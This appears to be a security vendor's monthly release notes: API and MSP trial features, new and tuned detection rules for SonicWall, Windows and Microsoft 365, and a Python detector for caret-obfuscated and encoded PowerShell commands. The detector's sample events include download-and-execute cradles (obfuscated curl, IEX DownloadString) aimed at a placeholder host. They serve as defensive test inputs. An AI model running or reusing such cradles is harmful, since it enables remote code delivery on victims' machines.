This month’s releases introduce new platform enhancements, including a public API evidence endpoint and MSP trial provisioning to improve reporting, integrations, and onboarding. We also added new detections across SonicWall, Windows, and Microsoft 365 to identify unauthorized access, persistence, and command obfuscation techniques. Additional updates improve detection accuracy, reduce false positives, and streamline integrations and reporting workflows.
Feature and Platform Updates
Public API: We added a new /evidence endpoint so the evidence behind a finding, that is, why it triggered, can be retrieved through the API, supporting deeper reporting without logging into the app. See the endpoint in our Swagger documentation, here.
MSP Trial Provisioning: MSPs can now create new accounts with a 30-day Automate trial directly from the MSP Portal. This allows you to quickly onboard customers and give them full access to Automate’s capabilities, including detection, response, and support, without any upfront commitment. A built-in countdown helps track the trial period, making it easy to demonstrate value and convert customers before the trial ends. Learn more about Automate trials, here.
Detection Updates
| Log Type | Rule | Details |
|---|---|---|
| SonicWall | NEW - SonicWall: SSL-VPN Enable Detected | This new detection rule detects when SSL-VPN has been enabled on a SonicWall device. While this may be legitimate administrator activity, enabling SSL-VPN after a compromise can give an attacker persistent remote access to the network. Default state: Enabled |
| SonicWall | NEW - SonicWall: Management Access Enabled | This new detection rule detects configuration changes that enable management access, such as HTTPS or SSH, on a SonicWall device. Unauthorized management access changes may indicate an attacker gaining administrative control after a compromise. Default state: Disabled |
| Windows | NEW - Active Directory Computer Account Creation | This new detection rule detects when a computer account is created in Active Directory, which may indicate a new device being joined to the domain. Verify that the activity was performed by an authorized administrator. Default state: Disabled |
| Windows | NEW - Potential Application Shimming via Sdbinst | This new detection rule detects execution of sdbinst.exe to install a shim database (.sdb) file. The Application Shim Infrastructure is a legitimate Windows compatibility feature, but it has been abused for persistence by threat actors, including FIN7. Default state: Enabled |
| Windows | NEW - PowerShell: Encoded Command Execution | This new detection rule detects suspicious encoded PowerShell commands. Encoded commands are commonly used by administrative scripts and software, but threat actors frequently combine encoding with other obfuscation techniques to evade detection. Default state: Disabled |
| Windows | NEW - Windows Command Shell Caret Obfuscation | This new detection rule detects commands executed with caret characters inserted between the letters of a command name. The Windows command shell treats the caret as an escape character, so ^c^u^r^l is interpreted as curl; this evasion technique is strongly associated with malicious activity. Default state: Enabled |
| Azure Signin | UPDATE - Azure: Entra ID Anomalous Agent Sign-In Activity | We fixed an issue where the detection could trigger incorrectly when conditional access status data was parsed into an unexpected field, producing false positive findings for successful sign-ins that should have been excluded. |
| Azure Signin / Microsoft 365 | UPDATE - Microsoft 365: User Authentication from New Country | We added the app field to this rule’s evidence, so findings now show which application was used for authentication. |
| Microsoft 365 | UPDATE - Microsoft 365: Potential Mailbox Permissions Change | We refined this rule’s exclusion logic to reduce false positives from NT AUTHORITY\SYSTEM accounts and Microsoft Exchange Admin API operations. |
| Microsoft 365 | UPDATE - Microsoft 365: Significant eDiscovery Activities Detected | We renamed this rule, which still appeared in the app as “M365 eDiscovery Role Change”, so that it matches its findings, which were already correctly labelled “Microsoft 365: Significant eDiscovery Activities Detected.” The rule and its findings now carry the same name. |
| Traffic | UPDATE - RDP Connection from Public IP | We added exclusions for Cisco FTD connection lifecycle events (teardown, NAT translation, and flow offload logs) to prevent false positives. |
| Windows | UPDATE - Endpoint TOR Traffic | We extended coverage to macOS and Linux endpoints in addition to Windows, so TOR traffic is identified across all Blumira Agent-supported operating systems. |
| Windows | UPDATE - Password Spraying - 4625 & 4648 | We adjusted the user threshold for improved detection accuracy and updated the investigation workflow. |
| Windows | UPDATE - PowerShell: Execution from Suspicious Parent Process | We reworked this detection to shift its focus from encoded command execution to a broader parent-process-based approach. The rule now identifies PowerShell spawned by suspicious parent processes such as macro hosts, LOLBins, browsers, and web shells. |
| Windows | RETIRED - Potential Brute Force - 4625 & 4771 | After a thorough review, we determined this rule was generating excessive noise without producing true positive matches, particularly from 4771 events related to expired cached credentials, and retired it. |
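The two command-line evasion rules in the table (caret obfuscation and encoded PowerShell) share a practical subtlety: the caret trick can be used to hide the `-EncodedCommand` switch itself, so a detection that matches on the raw command line misses the stacked case. The following is an added example, not Blumira's detection logic, that applies cmd.exe's escape rules first and only then looks for an encoded payload. The process-creation events, the `example.invalid` URLs, and the `analyze`/`scan` helper names are constructed for illustration; the `-e`/`-ec`/`-enc` switch spellings are the common ones rather than every prefix powershell.exe accepts.

```python
"""Normalize-then-match detection for two Windows command-line evasions:
caret obfuscation in cmd.exe and PowerShell -EncodedCommand launches.
Added example with constructed sample events; not vendor code."""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 payload (assumption:
# common spellings only; powershell.exe accepts any unambiguous prefix).
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})"
)
# A caret wedged between two alphanumerics escapes nothing that needs escaping,
# so it only ever serves to break up a command name for signature evasion.
CARET_IN_WORD_RE = re.compile(r"[A-Za-z0-9]\^[A-Za-z0-9]")


def strip_caret_escapes(cmdline: str) -> str:
    """Apply cmd.exe's escape rules: outside double quotes, ^x yields x
    (so ^^ is a literal caret); inside double quotes the caret is literal."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])  # keep the escaped character only
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the line carries an -EncodedCommand
    payload (base64 of UTF-16LE text), otherwise None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real payload; let other logic handle it


def analyze(cmdline: str) -> dict:
    """Normalize before matching so the two techniques cannot be stacked:
    caret stripping runs first, the encoded-command check sees the result."""
    normalized = strip_caret_escapes(cmdline)
    decoded = decode_encoded_command(normalized)
    return {
        "caret_obfuscation": bool(CARET_IN_WORD_RE.search(cmdline)),
        "normalized": normalized,
        "encoded_powershell": decoded is not None,
        "decoded_command": decoded,
    }


def _b64_utf16(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (CommandLine only); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "CommandLine": r"cmd.exe /c c^u^r^l http://example.invalid/x -o %TEMP%\x.exe"},
    {"id": 2, "CommandLine": "powershell.exe -nop -w hidden -enc "
     + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    # stacked: carets hide both the binary name and the -ec switch
    {"id": 3, "CommandLine": "cmd.exe /c p^o^w^e^r^s^h^e^l^l -e^c " + _b64_utf16("whoami")},
    # benign: ^& is a legitimate escape of the command separator
    {"id": 4, "CommandLine": 'cmd.exe /c echo "keep ^ this" ^& dir'},
    {"id": 5, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def scan(events):
    """Return (event id, rule name, evidence) tuples for every match."""
    findings = []
    for ev in events:
        r = analyze(ev["CommandLine"])
        if r["caret_obfuscation"]:
            findings.append((ev["id"], "Windows Command Shell Caret Obfuscation", r["normalized"]))
        if r["encoded_powershell"]:
            findings.append((ev["id"], "PowerShell: Encoded Command Execution", r["decoded_command"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Events 1, 2 and 3 produce findings (event 3 twice, once per technique), while events 4 and 5 stay quiet: the quoted caret and the escaped `&` are normal cmd.exe usage, and `-ExecutionPolicy` is not an encoded-command switch. Surfacing the normalized command line and the decoded script as evidence is what turns a noisy hit into something an analyst can triage in seconds.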
Bug Fixes and Improvements
Bug Fixes
- Microsoft Defender for Cloud Apps Cloud Connector: We improved the stability of the Defender for Cloud Apps integration by resolving timeout scenarios that were impacting some customers who had recently configured the connector.
- Microsoft 365 Cloud Connector: We corrected labeling and UX messaging for some edge-cases to make those errors clearer and easier for users to act on.
Improvements
- Global Reports: We added the description field to the "Azure - Login Outside of United States" global report, which indicates whether or not each login attempt was successful.
- Public API Rate Limits: We increased API rate limits for MSPs to 100 requests per second, enabling faster data retrieval at scale.
February 2026 Release Notes
In case you missed the February updates, you can find and review those notes here.
Eric Pitt
Eric is a Product Marketing Manager at Blumira focusing on customer research and positioning to continuously improve the Blumira platform.